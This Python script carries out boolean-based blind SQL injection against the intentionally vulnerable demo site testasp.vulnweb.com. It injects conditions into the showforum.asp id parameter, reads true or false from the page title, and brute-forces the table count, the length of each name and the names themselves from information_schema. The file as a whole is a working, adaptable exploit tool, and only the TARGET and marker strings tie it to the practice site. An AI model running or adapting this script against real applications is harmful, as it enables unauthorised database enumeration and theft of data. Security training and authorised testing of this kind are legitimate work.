#!/usr/bin/python
import requests
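# Boolean-based blind SQL injection walkthrough against Acunetix's intentionally
# vulnerable demo site (testasp.vulnweb.com). The injection point is the `id`
# query parameter of showforum.asp; the oracle is the page title, which reads
# "acuforum Miscellaneous" only when the injected condition evaluates true.
#
# Only run this against systems you are explicitly authorised to test.

# Everything after "and " is the injected boolean condition.
TARGET = "http://testasp.vulnweb.com/showforum.asp?id=2 and "
# Substring of the response that distinguishes a true condition from a false one.
TRUE_MARKER = "<title>acuforum Miscellaneous</title>"
# Upper bounds of the brute-force loops (the original scanned 1..19 for both);
# raise them if a probe never hits.
MAX_TABLES = 19
MAX_NAME_LENGTH = 19
# Characters tried at each position of a table name. The original scan covered
# chr(65)..chr(122) only, so a name containing a digit could never be recovered;
# digits are tried first, then the original range (A-Z, a few punctuation
# characters, a-z). No quote character is in the set, so a recovered name can
# be embedded in a single-quoted SQL literal without breaking the query.
CHARSET = "0123456789" + "".join(chr(c) for c in range(65, 123))
# Per-request timeout in seconds so a stalled server cannot hang the scan.
TIMEOUT = 10
# Subquery returning one table name that has not been extracted yet; `{}` is
# filled with a comma-separated list of quoted names to exclude.
NEXT_TABLE = ("(select top 1 table_name from information_schema.tables "
              "where table_name not in ({}))")


def sql_quote(name):
    """Return `name` as a single-quoted SQL string literal (quotes doubled)."""
    return "'" + name.replace("'", "''") + "'"


def exclusion_list(known):
    """Build the `not in (...)` payload: the empty string plus every known name."""
    return ",".join(sql_quote(n) for n in [""] + list(known))


def ask(session, condition):
    """Return True if the injected boolean `condition` holds on the server.

    `condition` is appended verbatim after "id=2 and ", so callers must build it
    only from fixed SQL fragments and CHARSET-restricted names.
    """
    resp = session.get(TARGET + condition, timeout=TIMEOUT)
    return TRUE_MARKER in resp.text


def find_table_count(session):
    """Brute-force count(*) of information_schema.tables.

    Returns the count, or None if no value in 1..MAX_TABLES matched (wrong
    oracle marker, or more tables than MAX_TABLES).
    """
    print("\n#### Find Num of Table ####")
    for count in range(1, MAX_TABLES + 1):
        condition = "(select count(*) from information_schema.tables) = " + str(count)
        if ask(session, condition):
            print("table_number = '" + str(count) + "' is Correct")
            return count
        print("test_number = '" + str(count) + "'")
    return None


def find_name_length(session, index, known):
    """Brute-force len() of the next table name not in `known`.

    Returns the length, or None if nothing in 1..MAX_NAME_LENGTH matched.
    """
    subquery = NEXT_TABLE.format(exclusion_list(known))
    for length in range(1, MAX_NAME_LENGTH + 1):
        print(str(index) + "_table_length test = " + str(length))
        if ask(session, "len(" + subquery + ") = " + str(length)):
            print(str(index) + "_table_length = '" + str(length) + "' is correct")
            return length
    return None


def extract_name(session, index, known, length):
    """Recover the next table name character by character.

    A position for which no CHARSET candidate matches is reported as "?" so the
    remaining characters keep their positions (the original silently skipped
    the position, shifting the rest of the name left).
    NOTE(review): with a case-insensitive collation both 'a' and 'A' match, and
    the first hit wins, so letters come back in the case tried first (upper).
    """
    subquery = NEXT_TABLE.format(exclusion_list(known))
    print("\n#### Find name of " + str(index) + "_Table ####")
    result = ""
    for pos in range(1, length + 1):
        for ch in CHARSET:
            condition = ("substring(" + subquery + ", " + str(pos) + ", 1) = '"
                         + ch + "'")
            if ask(session, condition):
                result += ch
                print(str(index) + "_table_name = " + result)
                break
        else:
            result += "?"
            print(str(index) + "_table_name = " + result
                  + "  (no CHARSET match at position " + str(pos) + ")")
    return result


def main():
    """Enumerate table names through the blind oracle; returns the list found."""
    session = requests.Session()
    count = find_table_count(session)
    if count is None:
        raise SystemExit("no table count matched in 1.." + str(MAX_TABLES)
                         + "; check TRUE_MARKER or raise MAX_TABLES")
    known = []
    print("\n#### Find Length of Table ####")
    for index in range(1, count + 1):
        length = find_name_length(session, index, known)
        if length is None:
            print("table " + str(index) + ": no length matched in 1.."
                  + str(MAX_NAME_LENGTH) + "; stopping")
            break
        name = extract_name(session, index, known, length)
        if "?" in name:
            # An incomplete name cannot be excluded via `not in`, so the next
            # iteration would extract the same table again; stop instead.
            print("table " + str(index) + " only partially recovered ("
                  + name + "); widen CHARSET and re-run")
            break
        known.append(name)
    return known


if __name__ == "__main__":
    main()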